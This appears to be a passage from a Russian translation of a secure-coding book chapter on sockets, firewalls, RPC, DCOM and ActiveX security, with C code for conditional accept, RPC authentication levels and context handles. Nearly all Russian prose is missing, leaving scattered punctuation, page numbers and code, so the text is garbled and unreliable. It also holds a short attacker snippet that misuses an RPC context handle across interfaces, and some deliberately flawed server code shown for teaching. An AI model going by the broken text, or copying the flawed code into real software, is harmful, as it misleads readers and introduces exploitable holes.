SO_EXCLUSIVEADDRUSE
DACL,
.
.

TCP
RFC, TCP,
, .
,
, TCP ACK
. ,
, .
(Douglas Comer) Internet
working with TCP/IP Vol. 1: Principles, Protocols, and Architectures (4th Edition) (Pren
tice Hall, 2000) ( . /I. . 1. , . .:
, 2003).
:
( ),

.
40 TCP IP.
,

.
TCP/IP
,
. ,
, , .

. ,
. ,
, .
,
. ,
Webc,
. ,
close shutdown.

,
, ,
. IP ,
: ,
15
399
. ,
, , (multihomed)
. .

. , IP
,
/.
, IP ,
;
. ,
,
. ,
. ,
IP :
;
IP(),
;
, .
IP
Windows NT. ,
, ,
.

API Windows Sockets 2.0 (Winsock)
, .
, (, UDP), :
IP ,
. ,
.
, , ,
.
(, TCP)
. , TCP
.
, SYN.
(, ),
SYNACK,
ACK. .
, FIN.
FINACK .
, FIN
FINACK ,
(maximum segment lifetime, MSL).
400
III
MSL ,
, .
,
accept ( Accept
Connection.cpp, Secureco2\Chapter15\AcceptConnection):
void OldStyleListen(SOCKET sock)

{
// . .
// .
int conns = 0;
while(1)
{
// .
if(listen(sock, SOMAXCONN) == 0)
{
SOCKET sock2;
sockaddr_in from;
int size;
// ! accept,
// .
conns++;
size = sizeof(sockaddr_in);
sock2 = accept(sock, (sockaddr*)&from, &size);
if(sock2 == INVALID_SOCKET)
{
printf(" ! %d\n",
GetLastError());
}
else
{
// :
// .
printf(" %s\n",
inet_ntoa(from.sin_addr));
// , ;
// :
// .
if(conns % 2 == 0)
{
printf(" .\n");
// ! .
}
else
15
401
{
printf(" !\n");
}
closesocket(sock2);
}
}
else
{
//
printf(" !
break;
}
// ,
// .
if(conns > 10)
{
break;
}
}
}
,
. ? ,
, ,
. , ,
. ,
. ,
, IP
, FINACK FIN .
MLS.
,
,
. setsockport
SO_LINGER
closesocket. .
WSAAccept.
SO_CONDITIONAL_ACCEPT
,
.
int CALLBACK AcceptCondition(

IN LPWSABUF lpCallerId,
IN LPWSABUF lpCallerData,
IN OUT LPQOS lpSQOS,
IN OUT LPQOS lpGQOS,
IN LPWSABUF lpCalleeId,
OUT LPWSABUF lpCalleeData,
OUT GROUP FAR *g,
402
III
IN DWORD dwCallbackData
)
{
sockaddr_in* pCaller;
sockaddr_in* pCallee;
pCaller = (sockaddr_in*)lpCallerId!>buf;
pCallee = (sockaddr_in*)lpCalleeId!>buf;
printf(" %s\n",
inet_ntoa(pCaller!>sin_addr));
// , Windows 98,
// Q193919.
if(lpSQOS != NULL)
{
// QOS.
}
// , !
// .
if(pCaller!>sin_addr.S_un.S_addr == inet_addr(MyIpAddr))
{
return CF_REJECT;
}
else
{
return CF_ACCEPT;
}
//
//
//
//
//
: CF_DEFER !
,
.
DNS! ,
, , .
}
void NewStyleListen(SOCKET sock)
{
// . .
// .
int conns = 0;
// .
BOOL val = TRUE;
if(setsockopt(sock,
SOL_SOCKET,
SO_CONDITIONAL_ACCEPT,
(const char*)&val, sizeof(val)) != 0)
15
{
printf(" SO_CONDITIONAL_ACCEPT !
= %d\n",
GetLastError());
return;
}
while(1)
{
// .
if(listen(sock, SOMAXCONN) == 0)
{
SOCKET sock2;
sockaddr_in from;
int size;
// ! accept,
// .
conns++;
size = sizeof(sockaddr_in);
// .
sock2 = WSAAccept(sock,
(sockaddr*)&from,
&size,
AcceptCondition,
conns); // conns .
if(sock2 == INVALID_SOCKET)
{
printf(" ! %d\n",
GetLastError());
}
else
{
// :
// .
printf(" %s\n",
inet_ntoa(from.sin_addr));
// ! .
closesocket(sock2);
}
}
else
{
//
printf(" !
403
404
III
break;
}
// ,
// .
if(conns > 10)
{
break;
}
}
}
, ; ,
,
.
:
[d:\]PortScan.exe !v !p 8765 192.168.0.1

Port 192.168.0.1:8765:0 timed out
:
[d:\]AcceptConnection.exe

!

!

192.168.0.1
10061
192.168.0.1
10061
192.168.0.1
10061
TCP
, , .
SYN . ,
SYN, .
, ,
.
, .
:

.
.
,
.
WSAAccept ,
SYN (SYN
flood).
( AcceptEx)
/.
15
405
,

,
. :
! . ,
(
).
, .
, ,
.

, .
,
. , .
, .
, ,
.
, ,
:
;
;
, ;
;
, IP ;
.
.

.
, ,
. ,
,
TCP.
, :

. ,
, .
, IP , .

.
406
III

FTP. 21 TCP,
TCP
20 ( 1024).
, ,
20
, .
, , Microsoft SQL Server,
1433, Microsoft Terminal Server ( 3389), X Window (
XWindow
) ( 6000).
,
,
.
. ,
. , ,
,
. , ,
.

(, TCP) , ,
( , UDP).
,
, .
, DNS,
:
Allow internal UDP high port to external UDP port 53

Allow external UDP port 53 to internal UDP high port

53 UDP ,
.
. ,
,
. ,
. , ,

. ,

( ), ,
.
15
407

,
.
, (
, ),
. ,

,
.
,
(content level
filters). ,
.
,
. , .
, Web
80 .
IP-

IPv6 ,
(network address translation, NAT)
, ,
.
IP, ,
, NAT . :
IP . ,

IPv6.

,
, .
.
,
. , ,
(
); , ,
, .
408
III

: ,
. ,
, .
;
,
.
, , syslog.
UNIX UNIX
Windows. UDP,
, syslog
.
,
.

. , (Kevin
Mitnick) rsh IP
(Tsutomu Shimomura). ,
TCP
, ,
, .
DNS. , DNS
, , , somehost.nicwguys.org,
, destruc
tion.evilhackers.org.
! , ,
,
.
IP DNS
.
.
rsh: , UNIX
( root) 1024.
:
, , ,
, . ,
. ,
, ,
, .
,
.
,
. ,
15
409
, ( ) ,
. ! ,
,
.
IPv6 !
IPv6 IP,
IP IPv4. IPv6 128
, IP
,
. IPv6 ,
, . IPv6
.
, ,
IP .
IPv6 , ,
IPv4, (Christian
Huitema) IPv6: The New Internet Protocol, Second Edition (IPv6:
) (Prentice Hall PTR, 1998).
Internet Activities Board IETF, Microsoft.
IPv6 Microsoft Windows .NET Server 2003
Service Pack 1 Windows XP.
IPv6.
IPv6 IPa. IPv6
IP, , .
, IPv6 IP.
IPv6 :
(link local), (site local) (global).
, ,
IP. IP, ,
,
. :
; .
IPv6 IPSec (Internet Protocol
Security). IPv6 .
IPv6, ,
(, ),

,
IPSec. ,
IPv6
, . , ,
Microsoft
.
IPv6 . ,
( IPv4) ,
410
III
. 64
IPv6
.
, ,
. , Windows .NET
Server 2003 .
,

.
,
. :
, .
, ,
.
16
RPC,
ActiveX-
DCOM
(Remote Procedure Call, RPC)

Microsoft Windows NT 3.1
( 1993 .). RPC: DCE (Distributed
Computing Environment) RPC ONC (Open Network Computing) RPC.
.
Microsoft DCE RPC,
Windows ONC RPC. , DCE RPC
Microsoft RPC, ONC RPC Sun RPC. RPC
DCE RPC, Microsoft,
RPC.
Windows NT/2000/XP
RPC.
,
RPC.
. , DCOM ActiveX.
, RPC DCOM (Distributed COM)
COM, ActiveX
COM.

, RPC, ,
Microsoft. ,
LSA ,
412
III
. , API;
API LsaLookupSids,
LSA RPC.
Malformed Security Identifier Request (
) http://www.microsoft.com/technet/security/bulletin/
ms99057.asp.
135
Windows NT 3.51/NT 4 RP,
, 100 ,
.
telnet 135,
. Telnet to Port 135
Causes 100 Percent CPU Usage ( Telnet 135 100
) Microsoft Knowledge Base (http://support
.microsoft.com/support/kb/articles/Q162/5/67.asp).
, Microsoft 2001 .
Malformed RPC Request Can Cause Service Failure ( RPC
), RPC (stubs),

, DoS.
http://www.microsoft.com/technet/security/bulletin/ms01041.asp.
RPC
RPC.
RPC,
RPC.
RPC .
RPC
RPC (Remote Procedure Call)
, .
,
RPC (RPC runtime) ,
.
RPC C
C++. ,
(, Perl, Microsoft JScript Microsoft Visual Basic) RPC
COM DCOM.
Microsoft Windows RPC
OSF RPC (Open Software Foundation RPC),
, UNIX Apple.
Windows [ Print Spooler (
), Event Log ( ), Remote Registry (
16
RPC, ActiveX- DCOM
413
), Secondary Logon ( )],

,
RPC. , , ,
RPC LRPC.
RPC-
RPC .
RPC
, RPC . RPC
:
;
;
( .idl);
( .acf).
C/C++.
: RPC, , RPC.
RPC, ,
, RPC. IDL.
( ,
),
. ACF
RPC, .

RPC .
1. IDL ACF Midl.exe.
: RPC .
2. RPC. :
, .
3. RPC
( Rpcrt4.lib).
4. RPC. ,

.
5. RPC
( Rpcrt4.lib).
! , (. 161).
( ) Phone,
Phonec.c, Phones.c, IDL ACF
Phone.idl Phone.acf. Phone.idl
Midl.exe : Phone.h
RPC Phone_c.c Phone_s.c. Phonec.c Phone_c.c
Ppcrt4.lib,
Phonec.exe. , Phones.c
414
III
Phone_s.c Ppcrt4.lib
Phones.exe.
Phone.idl
Phone.acf

Phone_c.c
Phone_s.c
Midl.exe
Link.exe
Phonec.exe
161.
Link.exe
Phonec.c
Phone.h
Phones.c
Phones.exe
RPC
, !
Phne Secureco2\Chapter16\RPC.
RPC-
RPC,
, , (marsalling)
.
, RPC
. ,
.
,
.
RPC
,
TCP/IP. : , ,
RPC.
(bind) ,
.
,
, (protocol sequences), .
. . 161
.
16
16-1.
RPC, ActiveX- DCOM
415
ncacn_np
ncalrpc
( )

ncacn_ip_tcp
TCP/IP
, ,
. ,
.
RpcStringBindingCompose. ,
ncacn_np:northwintraders[\\pipe\\phone]:
LPBYTE
LPBYTE
LPBYTE
LPBYTE
LPBYTE
LPBYTE
pszUuid
= (LPBYTE)NULL;
pszProtocolSequence
= (LPBYTE)"ncacn_np";
pszNetworkAddress
= (LPBYTE)"northwindtraders";
pszEndpoint
= (LPBYTE)"\\pipe\\phone";
pszOptions
= (LPBYTE)NULL;
pszStringBinding
= (LPBYTE)NULL;
RPC_STATUS status = RpcStringBindingCompose(pszUuid,

pszProtocolSequence,
pszNetworkAddress,
pszEndpoint,
pszOptions,
&pszStringBinding);
RPC.

RPC
: RPC
. ,
;
.

, .
,
cookie Web.
: RPC :
.
. .

.
416
III

RPC

. RPC :
DoS,
RPC, RPC
;

:
;
:
.
r ?
/robust MIDL-
Windows 2000 MIDL (Microsoft
Interface Definition Language) /robust.
, RPC
. ,
, RPC. ,
.
Windows 2000
, .
.
Windows 2000.
RPC Windows NT 4,
: Windows NT 4 Windows 2000 .
: /robust
MIDL.
/robust ,
.
[range]
IDL
, . , IDL
(blob) :
void Message([in] long lo,

[in] long hi,
[size_is(lo, hi)] char **ppData);
lo hi ,
,
.
16
RPC, ActiveX- DCOM
417
[range]. lo hi
0 1023, , ,
ppData, 1023 .
void Message([in, range(0,1023)] long lo,

[in, range(0,1023)] long hi,
[size_is(lo, hi)] char **ppData);
: , ,
IDL /robust. ,
, hi lo,
.

DoS
. ,
.
,
.
, , ,
. DoS ? :
, ,
. ,
, ,
! RPC
.
,
.
, ,
, . ,
, ,
.
.
RPC
( )
: (
) .
. ,
.

,

RpcBindingSetAuthInfo.
.
status = RpcBindingSetAuthInfo(
phone_Handle,
418
III
szSPN,
// Kerberos SPN .
RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
RPC_C_AUTHN_GSS_NEGOTIATE,
NULL,
0);
, szSPN, (service principal name,
SPN), . , AuthnLevel,
RPC_C_AUTHN_LEVEL_PKT_PRIVACY , ,
,
. . 162
RPC.
16-2.
RPC
RPC_C_AUTHN_LEVEL_
DEFAULT

.
, ,
. ,
,

!

RPC
RPC_C_AUTHN_LEVEL_CONNECT
RPC_C_AUTHN_LEVEL_NONE
.

RPC_C_AUTHN_LEVEL_
CONNECT
RPC_C_AUTHN_LEVEL_CALL

RPC. :
(
ncacn),
RPC_C_AUTHN_LEVEL_PKT
RPC_C_AUTHN_LEVEL_PKT
RPC_C_AUTHN_LEVEL_PKT_
RPC_C_AUTHN_LEVEL_PKT_
PRIVACY

RPC_C_AUTHN_LEVEL_PKT,

INTEGRITY
6
RPC_C_AUTHN_LEVEL_PKT_INTEG
RITY,
, Authn
Level ,
, .
: RpcBinding
SetAuthInfo
,
.
16
RPC, ActiveX- DCOM
419

,
.
RpcServerRegisterAuthInfo:
status = RpcServerRegisterAuthInfo(
szSPN,
NULL,
NULL);
Windows , AuthnSvc,
.
RPC_C_AUTHN_GSS_WINNT, NTLM
. , Windows 2000
RPC_C_AUTHN_GSS_NEGOTIATE:
: NTLM Kerberos.
RPC_C_AUTHN_GSS_KERBEROS, RPC_C_
AUTHN_GSS_NEGOTIATE ,
, Windows NT 4. ,
:
NTLM.

, RpcBindingInqAuthClient.
(NTLM Kerberos)
( , ,
..). .
// RPC! .
void Message(handle_t hPhone, unsigned char *szMsg) {
RPC_AUTHZ_HANDLE hPrivs;
DWORD dwAuthn;
RPC_STATUS status = RpcBindingInqAuthClient(
hPhone,
&hPrivs,
NULL,
&dwAuthn,
NULL,
NULL);
if (status != RPC_S_OK) {
printf(" RpcBindingInqAuthClient : 0x%x\n", status);
RpcRaiseException(ERROR_ACCESS_DENIED);
}
// .
// .
if (dwAuthn < RPC_C_AUTHN_LEVEL_PKT) {
420
III
printf(" .\n");
}
if (RpcImpersonateClient(hIfPhone) != RPC_S_OK) {
printf(" .\n");
}
char szName[128+1];
DWORD dwNameLen = 128;
if (!GetUserName(szName, &dwNameLen))
lstrcpy(szName, " ");
printf(": %s\n"
"%s %d\n",
szMsg, szName, dwAuthn);
RpcRevertToSelf();
}
. Message
.
RpcBindingInqAuthClient AuthnLevel.
AuthnLevel
, ,
, .

. ,
.
, ,
. Windows .NET Server 2003
(
).
Windows .NET Server 2003 Impersonate a client after
authentication ( )
, ,
.
Kerberos
szSPN, RpcBindingSetAuthInfo,
, Kerberos.
: Kerberos
, NTLM .
. Kerberos, szSPN
NULL.

DsMakeSPN. Ntdsapi.h
16
RPC, ActiveX- DCOM
421
Ntdsapi.dll. DsMa
keSPN.
DWORD cbSPN = MAX_PATH;

char szSPN[MAX_PATH + 1];
status = DsMakeSpn("ldap",
"blake!laptop.northwindtraders.com",
NULL,
0,
NULL,
&cbSPN,
szSPN);
,
:
LPBYTE szSPN = NULL;

status = RpcServerInqDefaultPrincName(
&szSPN);
if (status != RPC_S_OK)
ErrorHandler(status);
// .
status = RpcServerRegisterAuthInfo(
szSPN,
0, 0);
if (status != RPC_S_OK)
ErrorHandler(status);
...
if (szSPN)
RpcStringFree(&szSPN);

. RPC
? Microsoft Platform SDK
RPC RPCSvc,
RPC.
.
Windows XP Professional, Windows .NET Server 2003
500 256 .
,
100 . . 163
, :
TCP/IP.
422
III
16-3.
RPC
AuthnLevel

(ncacn_np),
TCP/IP
(ncacn__ip_tcp),
RPC_C_AUTHN_LEVEL_NONE
1926
1051
RPC_C_AUTHN_LEVEL_CONNECT
2023
1146
RPC_C_AUTHN_LEVEL_PKT_PRIVACY
2044
1160
,
. 10%,
. :
RPC_C_AUTHN_LEVEL_CONNECT RPC_C_AUTHN_LEVEL_
PKT_PRIVACY . RPC_C_AUTHN_
LEVEL_CONNECT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY.
.

RPC,
.
! 2000 .
Microsoft
,
RPC.
, (
RpcBindingSetAuthInfo)
. ( )
,
. ,
: ,
, . ,

,
RPC DCOM.
. 162 RPC_C_AUTHN_LEVEL_NO
NE, . 163 RPC_C_AUTHN_LEVEL_PKT_PRIVACY.

, (strict
handle). DoS.
.
, . [strict_con
text_handle] ACF ,
, .
16
RPC, ActiveX- DCOM
. 162. RPC RPC_C_AUTH_LEVEL_NONE.

. 163. RPC
RPC_C_AUTH_LEVEL_PKT_PRIVACY. ,
,
423
424
III
,
. IDL,
RPC :
.
interface PrinterOperations {
typedef context_handle void *PRINTER_CONTEXT;
void OpenPrinter([in, out] PRINTER_CONTEXT *ctx);
void UsePrinter([in] PRINTER_CONTEXT ctx);
void ClosePrinter([in, out] PRINTER_CONTEXT *ctx);
}
interface FileOperations {
typedef context_handle void *FILE_CONTEXT;
void OpenFile([in, out] FILE_CONTEXT *ctx);
void UseFile([in] FILE_CONTEXT ctx);
void CloseFile([in, out] FILE_CONTEXT *ctx)
}
++ RPC:
void OpenPrinter(PRINTER_CONTEXT *ctx) {

// !.
*ctx = new CPrinterManipulator();
if (*ctx == NULL)
RpcRaiseException(ERROR_NOT_ENOUGH_MEMORY);
// .
...
}
void UseFile(FILE_CONTEXT ctx) {
// .
CFileManipulator cFile = (CFileManipulator*)ctx;
// .
...
}
RPC,
.
, RPC
, CFileManipulator cFile = (CFileManipulator)ctx
. ,
.
void *ctxAttacker;
OpenPrinter(&ctxAttacker);
UseFile(ctxAttacker);
UseFile(ctxAttacker)
FILE_CONTEXT, PRINTER_CONTEXT.
16
RPC, ActiveX- DCOM
425
ACF,
[strict_context_handle]:
[explicit_handle, strict_context_handle]
interface PrinterOperations{}
interface FileOperations{}
RPC ,
PrinterOperations FileOperations
.

.
,
RPC.
, .
,
.

, ,
.
,
, .
,
,
.
RPC ,
( ,
), ,
. , RPC
.
, ( RPC

)
, ,
, ,
.
,
, ,
,
.
426
III

(NULL)
(
), ,
DoS.
NULL, :
void MyFunc(..., /* [ ] */ CONTEXT_HANDLE_TYPE *hCtx) {}

hCt NULL, hCtx.
hCtx . RPC
,
,
.
.
short OpenFileByID(handle_t hBinding,

PPCONTEXT_HANDLE_TYPE pphCtx,
short sDeviceID) {
short sErr = 0;
HANDLE hFile = NULL;
*pphCtx = NULL;
if (RpcImpersonateClient(hBinding) == RPC_S_OK) {
hFile = OpenIDFile(sDeviceID);
if (hFile == INVALID_HANDLE_VALUE) {
sErr = !1;
} else {
// .
FILE_ID *pFid = midl_user_allocate(sizeof ( FILE_ID));
if (pFid) {
pFid!>hFile = hFile;
*pphCtx = (PCONTEXT_HANDLE_TYPE)pFid;
} else {
sErr = ERROR_NOT_ENOUGH_MEMORY;
}
}
RpcRevertToSelf();
}
return sErr;
}
short ReadFileByID(handle_t hBinding, PCONTEXT_HANDLE_TYPE phCtx) {
FILE_ID *pFid;
short sErr = 0;
if (RpcImpersonateClient(hBinding) == RPC_S_OK) {
pFid = (FILE_ID *)phCtx;
ReadFileFromID(phCtx!>hFile,...);
RpcRevertToSelf();
} else {
16
RPC, ActiveX- DCOM
427
sErr = !1;
}
return sErr;
}
short CloseFileByID(handle_t hBinding, PPCONTEXT_HANDLE_TYPE pphCtx) {
FILE_ID *pFid = (FILE_ID *)*pphCtx;
pFid!>hFile = NULL;
midl_user_free(pFid);
*pphCtx = NULL;
return 0;
}

OpenFileByID. ,
,
. , RpcImpersonateClient Open
IDFile , pphCtx NULL.
CloseFileByID ReadFileByID,
.
RPC ,
NULL, .
if (*pphCtx == NULL) {
// .
}

RPC,
. RPC
,
, .
RPC ,

Identify ().
RpcBindingSetAuthInfoEx:
// .
RPC_SECURITY_QOS qosSec;
qosSec.Version = RPC_C_SECURITY_QOS_VERSION;
qosSec.Capabilities = RPC_C_QOS_CAPABILITIES_DEFAULT;
qosSec.IdentityTracking = RPC_C_QOS_IDENTITY_STATIC;
qosSec.ImpersonationType = RPC_C_IMP_LEVEL_IDENTIFY;
status = RpcBindingSetAuthInfoEx(..., &qosSec);
ImpersonationType :
RPC_C_IMP_LEVEL_ANONYMOUS ( ,
), RPC_C_IMP_ LEVEL_IDENTIFY (
), RPC_C_IMP_LEVEL_IMPERSONATE RPC_C_IMP_LEVEL_DELE
428
III
GATE ( , ,
).

RPC
. RPC RpcServer
RegisterIf RpcServerRegisterIf2 RpcServerRegisterIfEx,
, ,
RPC ,
.

RPC_C_AUTHN_LEVEL_PKT .
/*
Phones.cpp
*/
...
//
// RPC!.
RPC_STATUS RPC_ENTRY SecurityCallBack(RPC_IF_HANDLE idIF, void *ctx) {
RPC_AUTHZ_HANDLE hPrivs;
DWORD dwAuthn;
RPC_STATUS status = RpcBindingInqAuthClient(
ctx,
&hPrivs,
NULL,
&dwAuthn,
NULL,
NULL);
if (status != RPC_S_OK) {
printf(" RpcBindingInqAuthClient : 0x%x\ n", status);
return ERROR_ACCESS_DENIED;
}
// .
// .
if (dwAuthn < RPC_C_AUTHN_LEVEL_PKT) {
printf(" .\n");
return ERROR_ACCESS_DENIED;
}
return RPC_S_OK;
}
...
void main() {
...
16
RPC, ActiveX- DCOM
429
status = RpcServerRegisterIfEx(phone_v1_0_s_ifspec,
NULL,
NULL,
0,
RPC_C_LISTEN_MAX_CALLS_DEFAULT,
SecurityCallBack);
...
}
MSDN Platform SDK

: <_>(RPC_IF_ID interface, void context)
<_>(RPC_IF_HANDLE interface, void context).
, RpcServer
RegisterIfEx RpcServerRegisterIf2 RPC_IF_ALLOW_SECU
RE_ONLY. :
, RPC_C_AUTHN_LEVEL_NONE.
RPC_S_ACCESS_DENIED.
. ,
, RPC
, .
,
. : Windows NT 4/2000
( ) , Windows XP
.
RPC_IF_ALLOW_SECURE_ONLY ,
RpcServerUseProtSeq,
. , ,
LRPC.
TCP/IP . ,
, .
RPC-

, RPC ,
. RPC
.
, ,
.
RPC (
, RPC),
. ,
RPC: RPC1, LRPC, RPC2,
, RPC3, LRPC,
( , LRPC )
(. 164).
430
III
MyService.exe
MyService.exe
RPC 1
RPC 2
LRPC
RPC 3
LRPC
RPC 1
, LRPC

RPC 2
RPC 3
, LRPC

, LRPC

. 164. RPC

, , , LRPC,
RPC
, RPC
!
,
, RpcBindingToStringBinding,
RpcStringBindingParse
. :
, LRPC.
/*
Phones.cpp
*/
...
BOOL IsLRPC(void *ctx) {
BOOL fIsLRPC = FALSE;
LPBYTE pBinding = NULL;
if (RpcBindingToStringBinding(ctx, &pBinding) == RPC_S_OK) {
LPBYTE pProtSeq = NULL;
// ,
// NULL.
if (RpcStringBindingParse(pBinding,
NULL,
&pProtSeq,
NULL,
NULL,
NULL) == RPC_S_OK) {
printf(" %s\n", pProtSeq);
// ,
// LRPC.
if (lstrcmpi((LPCTSTR)pProtSeq, "ncalrpc") == 0)
fIsLRPC = TRUE;
if (pProtSeq)
16
RPC, ActiveX- DCOM
431
RpcStringFree(&pProtSeq);
}
if (pBinding)
RpcStringFree(&pBinding);
}
return flsLRPC;
}
...

,
! RPC
RpcEpRegister .
(, RPCDump.exe Windows 2000
Resource Kit) .
RPC_BINDING_VECTOR *pBindings = NULL;

if (RpcServerInqBindings(&pBindings) == RPC_S_OK) {
if (RpcEpRegister(phone_v1_0_s_ifspec,
pBindings,
NULL,
"!") == RPC_S_OK) {
// ! !
}
}
,
, , RPC
.

: ncacn_ip_tcp, ncacn_np
ncalrpc.
.
RPC , GetLastError
RPC . , ,
, 5
! .
net helpmsg nnnn, nnnn
, .
432
III

DCOM
DCOM RPC, COM
, , RPC,
. ,
, DCOM ,
, .
. , !
DCOM
Dcomcnfg.exe. Windows NT 4 Win
dows 2000 Distributed COM Configuration Properties
(: Distributed COM), Windows XP ,
COM+ DCOM. . 165
Default Properties ( )
Distributed COM Configuration Properties Windows 2000.
. 165. Default Properties

Distributed Com Configuration Properties
, DCOM .
: ,
. , COM
(COM Internet Services). RPC HTPP,
Web RPC DCOM.
, ,
HTTP. , ,
.
16
RPC, ActiveX- DCOM
433
RPC.
Connect (), RPC_C_AUTHN_CONNECT.
Identify (),
RPC_C_IMP_LEVEL_IDENTIFY.
Default Properties Provide additional security for
reference tracking ( ).
COM.
IUnknown::AddRef, IUnknown::Release.
IUnknown::AddRef,
, , .
, COM ,
, , IUnknown::AddRef
,
. ,
? ,
, :
.

CoInitializeSecurity,
EOAC_SECURE_REFS dwCapabilities.
Default Security ( )
, .
, ,
,
, .
, DCOM
. ,
, DCOM,
.
Administrators () Power
Users ( ). , Power Users Win
dows 2000, Windows NT, ,
.
, , , , ,
. ,
. ,
: Power Users
, .
Windows NT 4 SP 4 Default Protocols (
) , DCOM.
TCP UDP
[ ConnectionOriented
TCP/IP ( TCP/IP) Datagram UDP/IP (
UDP/IP)]. DCOM

, TCP
, .
434
III

, ,
.
Applications () Distributed COM Confi
guration Properties ,
HKEY_LOCAL_MACHINE\Software\Classes\AppId. :
, .
, ,
, .

,
. :
,
DLL. ,
, DCOM
. ,
. , TCP UDP,
.
DCOM
( 135 )
, . :
Windows 2000, ,
.
DCOM
. ,
, . , ,

.
DCOM
DCOM
. : ,
, , SYS
TEM ( DCOM,
) . ,
DCOM, () ,
, .
.
DCOM .
.
,
.
,
. , :
, Windows 2000,
16
RPC, ActiveX- DCOM
435
. DCOM
Windows NT 4.0,
. Windows 2000
,
. , ,

(window station) ,
. Platform SDK.

, ,
. ,
, DCOM
, ,
. ,
. API
.
, , DCOM
. ,
DCOM
,
,
. .

DCOM
Local System , Windows XP,
. Local System ,
.
, , .

. DCOM
, ( )
Identify.
. DCOM
Identify,
CoInitializeSecurity API
Impersonate.
, Windows .NET Server
,
7.

Microsoft Transaction Server ,
. ,
436
III

. , ,
. ,
DCOM, Log on as a batch job (
). Dcomnfg.exe
,
, .
,
.
. DCOM

. ,
? :
LSA.
: 3000 ,
. 3000 ,
. ,
,
99,9% (

1000 ). , 3000
, (0,999) 3000, 0,05.
18 ,
. ,
.
DCOM
. ,
(, ),
.
, : 20
, 3000.
.
.
,
(
). SMS (Systems Management Server)
, .
, ,
, .
! , , ,
,
. , , Windows XP Windows .NET Server
LocalService NetworkService.
.
16
RPC, ActiveX- DCOM
437

DCOM
, . CoInitializeSecurity
,
, IlientSecurity::SetBlanket.
, COM ,
(blanket).
, CoInitializeSecurity.
HRESULT CoInitializeSecurity(
PSECURITY_DESCRIPTOR pVoid, //
LONG cAuthSvc,
// asAuthSvc
SOLE_AUTHENTICATION_SERVICE * asAuthSvc,
//
void * pReserved1,
//
DWORD dwAuthnLevel,
//
//
DWORD dwImpLevel,
//
//
SOLE_AUTHENTICATION_LIST * pAuthList,
//
//
DWORD dwCapabilities,
//
// /
void * pReserved3
//
);
.
: ,
(application ID, AppID) IAccessControl.
PSECURITY_DESCRIPTOR,
dwCapabilities. AppID, ,
. ,
,
.
( NULL). Platform SDK
( , ,
) , , NULL,

dwAuthnLevel. .
.
, cAuthSvc 1.
dwAuthnLevel,
. ,
RPC_C_AUTHN_LEVEL_PKT_PRIVACY
.
.

, .
438
III
, .
,
.
,
, !
, RPC_C_IMP_LEVEL_IDENTIFY RPC_C_IMP_LE
VEL_ANONYMOUS,
.
dwCapabilities.
EOAC_STATIC_CLOAKING EOAC_DYNAMIC_CLOAKING
Windows 2000 (loaking).

, .

.
EOAC_SECURE_REFS.
, .
Windows 2000, EOAC_NO_CUSTOM_MAR
SHAL. DCOM
DLL.
EOAC_NO_CUSTOM_MARSHAL
CLSID, Ole32.dll (Component Services).
CLSID ,
COM. DCOM
(object references, OBJREF), CLSID.
CLSID
DLL. , OAC_NO_CUS
TOM_MARSHAL, CoInitializeSecurity
CLSID, CATID_Marshaler.
EOAC_DISABLE_AAA ,
,
E_ACCESSDENIED. ,
CoInitializeSecurity,
(, Local System),
. Windows 2000
.

DCOM (.
Secureco2\Chapter16\DCOM_Security). ATL COM App
Wizard Microsoft Visual C++ 6
DCOM, ISecurityExample,
GetServerBlanket.
STDMETHODIMP CSecurityExample::GetServerBlanket(DWORD * AuthNSvc,

DWORD * AuthZSvc,
DWORD * AuthLevel,
16
RPC, ActiveX- DCOM
439
DWORD * ImpLevel)
{
IServerSecurity* pServerSecurity;
OLECHAR* PriName;
if(CoGetCallContext(IID_IServerSecurity,
(void**)&pServerSecurity) == S_OK)
{
HRESULT hr;
hr = pServerSecurity!>QueryBlanket(AuthNSvc,
AuthZSvc,
&PriName,
AuthLevel,
ImpLevel,
NULL,
NULL);
if(hr == S_OK)
{
CoTaskMemFree(PriName);
}
return hr;
}
else
return E_NOINTERFACE;
}
, :
, IserverSecurity
(blanket). .
TestClient ,
, IClientSecurity::SetBlanket,
, GetServerBlanket
. :
Initial client security settings:

Client Security Information:
Snego security support provider
No authorization
Principal name: DAVENET\david
Auth level = Connect
Impersonation level = Identify
Set auth level to Packet Privacy
Server Security Information:
Snego security support provider
440
III
No authorization
Auth level = Packet privacy
Impersonation level = Anonymous
TestClient.exe DCOM_Secu
rity.exe . DCOM_Security.exe
DCOM_Security.exe /regserver. ,

. ,
, ,
. :
, .

DCOM , ,
Windows 2000,
. DCOM ,

. (connectable object).
(connection points) [
(Guy Eddon) (Henry Eddon) Inside Distributed COM
(Microsoft Press, 1998)] .
,
.
, .
,
Local System ,
.
(sink)
. ,
. ,
, DCOM, ,
, ,
.
.
,
( COM/DCOM).

IDispatch::Invoke .
, ,
, ,
.
ActiveX
Microsoft COM (Component Object Model)

16
RPC, ActiveX- DCOM
441
. COM
,
IUnknown.
ActiveX COM,
IUnknown. IDispatch
(, Visual Basic Perl)
( , VBScript Jscript)
, Automation. ActiveX
,
COM,
(, Web ).

ActiveX
ActiveX
Web
. Web ActiveX
HTML ,
HTML, (,
) ActiveX
. , Outlook 2002 ( Microsoft
Office XP) ActiveX
, , , Outlook Express Windows .NET Server 2003
Windows XP.
ActiveX , ,
, HTML (
HTML)
ActiveX.
HTML ( Web ) Acti
veX ,
. , ,
(safe for initialization, SFI)
(safe for scripting, SFS),
.
ActiveX-,

ActiveX
COM IPersist.
, .
ActiveX,

, .
, ActiveX
, ,
442
III
. , ActiveX
, ,
Web.
, Microsoft Excel ,
,

.
, ActiveX
.
! ActiveX ,
Authenticode.
ActiveX
,
.
ActiveX, .
2001 . Web,
ActiveX.
, ,
. ,
, (, )
. , ActiveX Print,
! ,
, ActiveX
, Web,

,
.
, ? : Web
ActiveX,

. , Web
ActiveX Web, Print
.
, ActiveX
,
, .
Outlook View Control Exposes Unsafe Functionality (
Outlook
) (http://www.microsoft.com/technet/security/bulletin/MS01038.asp), Acti
ve Setup Control Vulnerability (
) (http://www.microsoft.com/technet/security/bulletin/MS99048.asp)
Office HTML Script and IE Script Vulnerabilities (,
HTML Office Internet
Explorer) (http://www.microsoft.com/technet/security/bulletin/MS00049.asp).
16
RPC, ActiveX- DCOM
443
! , ActiveX,
.
,
ActiveX, .
ActiveX
, msdn.microsoft.com
safe for scripting.
!
SFI- SFS-
ActiveX,
/ , : ActiveX
!
, , ,
. , , ActiveX
, .
, ActiveX
.
! :
,

.
( )
,
.
ActiveX-?
, ActiveX, :
, .
,
, :
, ,
;
(, ,
);
,
